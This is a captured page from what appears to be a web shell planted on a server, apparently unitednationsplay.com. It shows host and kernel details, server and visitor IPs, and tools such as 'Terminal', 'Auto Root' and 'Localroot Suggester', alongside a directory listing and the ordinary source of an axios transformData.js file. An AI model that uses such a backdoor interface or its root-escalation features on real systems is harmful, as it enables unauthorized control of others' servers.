Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.119.103.13
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp_probe /
node_modules /
axios /
lib /
core /
Delete
Unzip
Name
Size
Permission
Date
Action
Axios.js
2.14
KB
-rw-r--r--
1985-10-26 08:15
InterceptorManager.js
1.22
KB
-rw-r--r--
1985-10-26 08:15
README.md
336
B
-rw-r--r--
1985-10-26 08:15
createError.js
625
B
-rw-r--r--
1985-10-26 08:15
dispatchRequest.js
2.15
KB
-rw-r--r--
1985-10-26 08:15
enhanceError.js
592
B
-rw-r--r--
1985-10-26 08:15
settle.js
757
B
-rw-r--r--
1985-10-26 08:15
transformData.js
550
B
-rw-r--r--
1985-10-26 08:15
Save
Rename
'use strict'; var utils = require('./../utils'); /** * Transform the data for a request or a response * * @param {Object|String} data The data to be transformed * @param {Array} headers The headers for the request or response * @param {Array|Function} fns A single function or Array of functions * @returns {*} The resulting transformed data */ module.exports = function transformData(data, headers, fns) { /*eslint no-param-reassign:0*/ utils.forEach(fns, function transform(fn) { data = fn(data, headers); }); return data; };